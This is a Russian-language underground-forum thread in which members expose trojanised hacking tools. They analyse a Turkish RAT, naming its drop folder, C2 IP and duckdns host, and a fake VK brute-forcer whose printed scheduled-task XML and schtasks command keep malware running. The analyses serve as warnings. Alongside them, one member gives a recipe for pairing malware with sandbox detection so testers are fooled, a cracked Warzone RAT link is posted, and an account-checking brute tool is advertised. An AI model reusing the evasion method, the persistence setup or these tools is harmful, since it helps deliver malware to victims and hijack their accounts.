Разбираем склейки софта от школьников, барыг и вредителей

[Fedeks]

ARKADAŞLAR EVET SABAHTAN DÜZENLEMELER / İLAVELER YAPIYORUM ŞİMDİ YAPMAMI TAM OFİS KONUSUNUN HAZIR OLDUĞUNU DÜŞÜNDÜM! [Bazı Özellikler Kaldırılmadığından]

]

Sağ Tık Menü =>


Dosya Yöneticisi =>

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


Görev Yöneticisi =>

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


Masaüstü İzleme =>

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


Şifre Bölümü =>
[url = https: //i.hizliresim.com/gWAnNQ.png]

Kullanıcı Ayarları =>

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


Eğlence Menüsü =>

Bu resim yeniden boyutlandırıldı, tam halini görmek için tıklayınız.


Sunucu Editör =>



VirusTotal

​

 

[Bard]

ARKADAŞLAR EVET SABAHTAN DÜZENLEMELER / İLAVELER YAPIYORUM ŞİMDİ YAPMAMI TAM OFİS KONUSUNUN HAZIR OLDUĞUNU DÜŞÜNDÜM! [Bazı Özellikler Kaldırılmadığından]

СКЛЕЙКА !!!

1 : Файло дропается по пути : C:\Users\Юзер\Documents в папку MSDCSC ( ни чего не меняется , скучно...)

**********************
2 : Зверь под именем msdcsc.exe стучит на IP 195.174.0.76

**********************
3 : Открываем зверька в Restorator -е , вытаскиваем DCDATA .

**********************

4 : Идём на RC4 и декриптим этот самый датай .

**********************

5 : скачиваем бинарик и открываем оный в текстовом редакторе.

**********************
6: Кидаем обузу на darteo2.duckdns.org

**********************

7 : Зверька сливаем на вирустотал :

**********************

ПрЕвЕД Эрдогану ,

 

[GayFox]

как дроп в папку отловил?

 

[Pernat1y]

как дроп в папку отловил?

Любая песочница такое отловит.
Procmon тоже, как вариант.

 

[c0exist_]

В очередной раз убеждаюсь, что туркам доверять нельзя, даже по поводу софта.

 

[admin]

Забанил умника. За барыжничество у своих по рукам нужно давать. Не красиво, не профессионально и очень не этично. По-русски говоря - паскудство.

 

[Bard]

как дроп в папку отловил?

Диспетчер задач - наше ВСЁ !

Ну или любой другой монитор процессов , ( в моём случае самописный )

Ибо , современное зверьё "научено" скрываться от стандартного диспетчера задач ,
либо убивает этот процесс ( диспетчер задач)
Ловишь появившийся процесс .
Дальше как два пальца Абасс..фальт .


******************

Любая песочница такое отловит.
Procmon тоже, как вариант.

Не всегда.
Нынче малварь "умная" , ни в песке ни на варе не запуститься.
Любой из известных мониторов процессов или виртуальные виндЫ , а так же пески и прочие "защиты" ,
современная малварь определяет на раз .
Я бы не стал им доверять.
Ток живая система + малёх уверенности в том , что там не разомварэ какой нибудь.
Знание процессов своей железки , и моментальный отлов "постороннего" .
Ну и понятия как "оно" всё устроено и работает.

Забанил умника. За барыжничество у своих по рукам нужно давать. Не красиво, не профессионально и очень не этично. По-русски говоря - паскудство.

Ни убавить ни прибавить )
ТДурак , Сэр !

 

[GayFox]

Диспетчер задач - наше ВСЁ !
Посмотреть вложение 9537

Ну или любой другой монитор процессов , ( в моём случае самописный )

Посмотреть вложение 9538

Ибо , современное зверьё "научено" скрываться от стандартного диспетчера задач ,
либо убивает этот процесс ( диспетчер задач)
Ловишь появившийся процесс .
Дальше как два пальца Абасс..фальт .


******************


Не всегда.
Нынче малварь "умная" , ни в песке ни на варе не запуститься.
Любой из известных мониторов процессов или виртуальные виндЫ , а так же пески и прочие "защиты" ,
современная малварь определяет на раз .
Я бы не стал им доверять.
Ток живая система + малёх уверенности в том , что там не разомварэ какой нибудь.
Знание процессов своей железки , и моментальный отлов "постороннего" .
Ну и понятия как "оно" всё устроено и работает.


Ни убавить ни прибавить )
ТДурак , Сэр !

Понял тотже processhaker для этого подойдет она как вроде даже окрашивает файлы которые не из системы .
А насчет песочницы хотел поинтересоваться есть эксплоит - метод которые выходить за приделы песочницы
это возможно по вашему мнению?

 

[Bard]

тотже processhaker для этого подойдет

Processhaker и ProcessExplorer стоят на втором месте после стандартного диспетчера задач.
Тот же майнер умеет отлавливать окна всех этих трёх программ и сразу прятаться от них.

метод которые выходить за приделы песочницы
это возможно по вашему мнению?

--->>> ГУГЛ ( первые две ссылки прочитай )
Как по мне - делай две софтины : зверь + мирный софт + детект песочницы.
детектим песок - запускаем мирный софт.
НЕ детектим песок - запускаем мирный софт и зверя.
Тестирующий проверит софт в песке - успокоится и запустит на живой системе.
Песочница не есть панацея от заразы.
Мнение моё и не претендующее на единственно верное.

 

[GayFox]

Processhaker и ProcessExplorer стоят на втором месте после стандартного диспетчера задач.
Тот же майнер умеет отлавливать окна всех этих трёх программ и сразу прятаться от них.


Посмотреть вложение 9541



--->>> ГУГЛ ( первые две ссылки прочитай )
Как по мне - делай две софтины : зверь + мирный софт + детект песочницы.
детектим песок - запускаем мирный софт.
НЕ детектим песок - запускаем мирный софт и зверя.
Тестирующий проверит софт в песке - успокоится и запустит на живой системе.
Песочница не есть панацея от заразы.
Мнение моё и не претендующее на единственно верное.

допустим я включил диспетчер зверьек удалился с деспетчера а потом как он запустится?
как я понимаю только после перезагрузки?

 

[Cavalliere]

Да понятно что албанцам верить нельзя.
Проблема в том что, дохера школоты запускает софтины у себя на ПК, даже не на виртуплках, а именно прям у себя. На форуме же писали, что склеек нет ))
А потом плачут, как так, почему меня ломанули и всё увели.
Сыну уже столько раз подзатыльников отвешивал за подобные штуки.. Пап пап, я скачал платную софтину, но бесплатно, иди посмотри..
Беру сразу влэшку с новой осью и к нему в комнату ?
Раз в неделю ему по новой сетапить систему приходится. )) Но зато сейчас сидить на кали )) . Правда пароль что пиз**ц сложный 12345*****

 

[dreadful]

WARZONE_RAT_1.84_Cracked.zip - AnonFiles

anonfiles.com

 

[Pernat1y]

Ну, вы поняли

 

[c0exist_]

Детект при скачивании файла на AnonFiles говорит сам за себя.
Этот ТС уж выкладывал софт под названием Habib Crypter, но топик был удалён. Но я в очередной раз с уверенностью могу сказать, что поведение здесь точно такое же. Я забыл сказать то, что сначала в папку Roaming дропается батник igfx.bat, который запускает PowerShell-скрипт с атрибутом (показан на скриншоте выше), а тот в свою очередь выкачивает по IP-адресу другой PS-скрипт, который зашифрован алгоритмом Base64. Директория была удалена, но сам код скрипта у меня сохранился, прикреплю его файлом ниже, т.к. он слишком длинный.
Ссылка на тот самый топик, сохранённый кэшом гугла:

https://webcache.googleusercontent.com/search?q=cache:3ZXe8m6mGfkJ:https://xss.pro/threads/38389/+&cd=1&hl=ru&ct=clnk&gl=ru

 

[BUBUYAYAAA]

cn i have the passwrd to unzip
A.

 

[Bard]

Ссылка на тот самый топик, сохранённый кэшом гугла:

Этот ТС уж выкладывал софт под названием Habib Crypter, но топик был удалён.

Прямая ссылка на видео (формат mp4) --- КЛАЦ

 

[Kerimhan]

1) Добавлена возможность выбора Юзер-Агента
- Можно выбрать из 5 предустановленных (стандартных)
- Использовать свой Юзер-Агент
- Загрузить текстовик с Юзер-Агентами из которого будут рандомно браться Юзер-Агенты
(1 Юзер-Агент - 1 строка)
2) Автообновление прокси по ссылке
3) Сортировка по номеру телефона
- Если есть номер, то результат будет сохранен в "Number - YES.txt"
- Если нет - "Number - NO.txt"
4) Добавлена возможность НЕ сохранять текстовик с результатом чекера (NoCheckResult)
5) Исправлено отображение кол-ва друзей и подарков в чекере.

Скачать - [вырезано, склейка]

Скачать - [вырезано, склейка]

VT - https://www.virustotal.com/gui/file...3380f28c9eb08198cdbfc955482ba1163c9/detection (Так как это hack софт вт конечно будет ругаться )

Не заставляю запускать на основе !

 

[c0exist_]

Итак, после запуска этого софта в директорию C:\Users\admin\AppData\Local\Temp дропается файл VkBrute by DarkSHA v0.3.exe, что уже вызывает подозрение. После этого в этой же директории дропается подделка файла svchost.exe под названием svhost.exe (пропущена буква "c" перед "host") и после этого начинает происходит полная дичь: этот файл начинает запускать огромную кучу процессов самого себя, тем самым сильно нагружая компьютер. Процесс завершается и вместе с ним в ту же директорию запускается дропнутый этим же файлом start.exe, который тоже начинает запускать множество процессов самого себя, при этом ещё запускается cmd и планировщик задач. Сначала cmd запускает планировщик задач:

C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"

Планировщик задач в свою очередь дропает в директорию Temp файл SystemCheck.xml, это можно увидеть ниже:

schtasks.exe /Create /XML "C:\Users\admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"

SystemCheck.xml дропает в директорию C:\Users\admin\AppData\Roaming\Microsoft\Windows файл Helper.exe, что так же можно увидеть ниже, если взглянуть на него внутрь:

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Microsoft Corporation</Author>
    <Description>Starts a system diagnostics application to scan for errors and performance problems.</Description>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2017-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
    <TimeTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2017-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>true</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"%userprofile%\AppData\Roaming\Microsoft\Windows\Helper.exe"</Command>
      <Arguments>-SystemCheck</Arguments>
    </Exec>
  </Actions>
</Task>

И всё это продолжается и продолжается в течение длительного времени. Так же в ту же папку дропаются файлы 32.exe, 64.exe и текстовый файл CL_Debug_Log.txt, который на самом деле является экзешным.
Ещё процесс start.exe производит коннект на IP-адрес: 88.99.66.31 (при переходе происходит редирект на сайт "IP Logger").
Вообщем, это просто ядрёная бомба, а не брутер. Ни в коем случае не запускайте это на своих компьютерах, иначе потом будет очень тяжело всё это вычищать.
Скриншоты дропа:

 

[mikezexter]

Ну ок, такую можно и на виртуалке запустить без привязки к сетевым дискам, убьет - не страшно. Либо вовсе под Wine.
Сама-то софтина функциональна?

 

[c0exist_]

Ну ок, такую можно и на виртуалке запустить без привязки к сетевым дискам, убьет - не страшно. Либо вовсе под Wine.
Сама-то софтина функциональна?

На функциональность я не тестировал, меня больше всего волновало поведение данного, в кавычках, софта. Да и к тому же, не кажется ли тебе странным, что запускается огромное количество процессов svhost.exe, start.exe и ещё куча всякой чертовщины? И когда я говорю "огромное", я не преувеличиваю: их запускается от 20-30 штук, а то и больше. Ты угробишь свой компьютер быстрее, чем запустишь этот софт. Лучше ищи хорошую и нормальную альтернативу, а не вот этот троян.